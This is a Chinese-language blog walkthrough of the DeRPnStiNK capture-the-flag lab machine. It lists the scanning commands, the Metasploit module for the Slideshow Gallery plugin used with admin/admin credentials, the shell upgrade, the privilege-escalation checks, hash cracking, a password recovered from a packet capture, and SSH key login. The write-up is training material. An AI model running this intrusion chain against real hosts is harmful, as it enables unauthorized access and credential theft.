首页 > 其他分享 >DeRPnStiNK靶场实战

DeRPnStiNK靶场实战

时间:2023-06-04 19:11:39浏览次数:37  
标签:实战 登录 查看 扫描 用户 密码 DeRPnStiNK 10.10 靶场

实验环境

靶机:10.10.10.147
kali:10.10.10.128

靶机地址:

渗透过程

1. 主机发现

netdiscover -i eth0 -r 10.10.10.0/24

img

2. 服务探测

nmap -sS -sV -p- 10.10.10.147

img

思路21、22端口可能存在爆破

3. 浏览器查看web服务
目标主机开放了web服务,那就浏览器查看有没有什么漏洞或者信息。

通过查看源代码,发现flag1(在查看源代码时,一定要仔细,否则会忽略一些重要的信息!!!
img
在这里就一张照片,那就进行目录扫描一下呗!!!

4. 目录扫描
使用dirsearch进行目录扫描,并指定扫描使用字典文件,使用dirb进行扫描,多使用不同的扫描器进行扫描,以便得到更多信息。

dirsearch -u http://10.10.10.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirb http://10.10.10.147 -w 

img

img

简单访问访问扫描出来的目录,重点是robots.txt中的内容!!!
img

img

img

没有什么重要信息!!!访问http://10.10.10.147/weblog/跳转到http://derpnstink.local/weblog/。
从扫描出来的目录可以知道在/weblog/目录下有一个wordpress搭建的网站,那就使用wpscan扫描一下或者使用awvs扫描一下!

5. 使用wpscan和awvs进行扫描

wpscan --url http://derpnstink.local/weblog/ 

img

awvs扫描
img
通过awvs扫描出来弱口令:admin/admin
发现wordpress的plugin:slideshow-gallery存在漏洞(使用awvs扫描出来时,一时不知道怎么去利用该漏洞,经验太少了!!

那就使用该账号密码去登录登录,看看有没有什么漏洞或者信息吧!
img

6. 使用msfconsole

search Sildehow Gallery
set rhosts 10.10.10.147
set wp_user admin
set wp_password admin
set targeturi /weblog
run

img

img
使用python获取shell

python -c "import pty;pty.spawn('/bin/bash')"

获得应该低权限的用户,那就查看查看内核、敏感文件、特殊权限等等看看能不能提权

id
whoami
sudo -l
find / -perm -4000 2>/dev/null

img

7. 信息查找
经过上面的简单操作,并没有发现什么有用的信息(或许是自己太菜,没有发现)。那就查看查看敏感文件,如/etc/passwd、/var/www、/home等等

思路

  • 通过查看/etc/passwd、/home可以知道可登录的用户。
  • 通过查看/var/www目录,可以获取一些敏感信息,如网站配置文件、备份文件等等。

那就查查一下,在/home目录下和/etc/passwd中发现用户:mrderp、stinky
img
img
猜想解题思路:这里有两个用户,那接下来就是获取两个用户密码,最终获取系统管理员权限!!!

在wp-config.php文件中发现数据库账号密码:root/mysql
img

利用获得的数据库账号密码登录数据库查看一下信息!
img
发现flag2。在mysql数据库中查看user表,查看网站数据库,重要看看有没有什么可疑用户!
img
img
在这里找到了四个用户,其中root、admin的密码在前面已经找到了!那就破解破unclestinky、phpmyadmin的密码呗!
通过在线破解或者john破解数据库的密码。
img
img
通过破解发现unclestinky密码为wedgie57,phpmyadmin的密码为admin

提示:在获得一段密文时,不知道是什么加密的,可以使用hash-identifier来判断类型。

得到这些用户密码,我们去数据库或者网站登录登录,因为不同的用户可能设置了不一样的信息!登录后没有什么重要的信息!

8. 切换用户登录
根据前面的信息搜集,知道在目标系统中有两个用户mrderp、stinky,那么上面的unclestinky用户与stinky是否有联系,比如密码相同!(有点脑洞大开)那就试试看!

先使用ssh登录试试看,发现登录方式是私钥的登录方式,但是这里没有获得私钥,完蛋!

那就在获得的shell上面切换用户试试,发现stinky的密码和unclestinky一样,我靠,沙滩上盖房子,浪到家了,佩服佩服
img
得到了flag3,到这里还差一个用户的密码,那就回到前面的信息搜集工作步骤,主要查看该用户下面的敏感文件、特殊权限等等。

通过查找发现提示
img
大概意思时,通过抓包可以获取mrderp密码
!那就去查找查找在这个用户中是否存在抓包文件。
img
得到抓包文件,再去寻找寻找其它信息
img
最终找到了ssh私钥文件!
img

将这两个文件下载到kali主机上,对抓包文件使用wireshark打开查看查看其中的协议内容。

http and http.request.method=="POST"

内容太多了,过滤过滤http协议
img
找到了mrderp的密码为derpderpderpderpderpderpderp,到这里有密码、有私钥,那就使用ssh和获得的shell分别登录目标系统查看查看。
ssh登录

ssh -i key.txt [email protected]

然后还是一样的,查找敏感文件、特殊权限!
img
通过查找没有发现binaries文件下没有derpy文件,所以创建一个新文件。(反正到这里,经验太少所以蒙了),通过上面的步骤成功提权!
img

总结:

  • 这里可以利用CVE-2021-4034进行提权
  • 巩固wireshark的使用
  • 多注意细节、多点耐心,多多练习!!!

标签:实战,登录,查看,扫描,用户,密码,DeRPnStiNK,10.10,靶场
From: https://www.cnblogs.com/kalixcn/p/17456132.html

相关文章

  • .Net Core后端架构实战【3-介入IOC控制反转】
    摘要:基于.NETCore7.0WebApi后端架构实战【2-介入IOC控制反转】  2023/04/09,ASP.NETCore7.0,VS2022引言InversionofControl,简称IOC,即控制反转。记得当初刚实习的时候公司的带我的人和我提到过IOC这个概念,当初完全不知道是啥东西。后来有幸写了半年Java,Spring......
  • 读<Wireshark数据包分析实战-第3版>之协议 ICMP,STP,DHCP
    ICMPICMP(InternetControlMessageProtocol,互联网控制报文协议)是一个网络层协议,用于在IP主机和路由器之间传递控制消息。它主要负责提供关于网络通信问题的反馈,如无法到达的目标主机、不可达的网络等。ICMP位于TCP/IP协议栈中的第三层,即网络层。ICMP有许多类型的消息,常见的......
  • 逆向大法好-----实战中的IDA和OD一把梭
    0X01一直对D盾检测账号克隆的功能感到好奇,终于跟着老师傅的教程手把手学会了怎么用IDA,OD配合去逆向分析。D盾有一项功能是账号克隆:通过StudyPe查看,使用了NetUserEnum相关的函数通过查看msdn的例子:https://docs.microsoft.com/zh-cn/windows/desktop/api/lmaccess/nf-lmaccess-netus......
  • Dubbo实战篇--异步
    theme:cyanosis日期更新说明2023年6月3日初版编辑最是人间留不住,朱颜辞镜花辞树离开这段时间,发现Dubbo其实已经已经发布到了3.2了,其实有点断更。前言“异步”作为性能优化的利器之一,对于系统优化是一种常见思路;Dubbo天然的异步模式,不需要启动多线程即可完成......
  • 读<Wireshark数据包分析实战-第3版>之255.255.255.255
    255.255.255.255是一个特殊的IPv4地址,被称为受限广播地址(LimitedBroadcastAddress)。当一个设备发送一个数据包到255.255.255.255,网络中所有连接在同一局域网(LAN)的设备都会收到并处理该数据包。受限广播地址主要用于以下场景:在没有分配IP地址之前,设备使用它来寻找DHCP......
  • 极客时间--golang并发实战课--Mutex的常见使用错误场景
    1.Lock/Unlock没有成对出现,就意味着会出现死锁的情况,或者是因为Unlock一个未加锁的Mutex而导致panic。2.第二种误用是Copy已使用的Mutex。Packagesync的同步原语在使用后是不能复制的。原因在于,Mutex是一个有状态的对象,它的state字段记录这个锁的状态。如果你要复......
  • 极客时间--golang并发编程实战课--Mutex学习总结
    互斥锁的实现机制互斥锁是并发控制的一个手段,是为了避免竞争而建立的一种并发控制机制。在并发编程中,如果程序中的一部分会被并发访问或修改,那么,为了避免并发访问导致的意想不到的结果,这部分程序需要被保护起来,这部分被保护起来的程序,就叫做临界区。可以说,临界区就是一个被共......
  • ansible实战-2023
    环境信息:cat/etc/ansible/hosts[webserver]192.168.31.18ansible_ssh_user=rootansible_ssh_pass=123456http_port=815testvar=31.18mysql_port=3309[dbserver]192.168.31.19ansible_ssh_user=rootansible_ssh_pass=123456http_port=816testvar=31.19mysql_port=3310......
  • openmmlab实战营二期-mmpose代码课(三)
    openmmlab实战营二期-mmpose代码课(三)点我:视频地址由于代码课涉及笔记较少,多数为代码实战,简单总结代码课涉及的内容:主要分环境配置、训练和预测rtmdet模型、训练和预测rtmpose模型,细分见下:1、环境配置:1)安装pytroch2)安装openmim、mmengine、mmcv、mmdet3)安装其他库(如cv2......
  • openmmlab实战营二期-开营仪式(零)
    openmmlab实战营二期-开营仪式(零)点我:视频地址主页:https://www.cnblogs.com/xielaoban/本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文连接,否则保留追究法律责任的权利......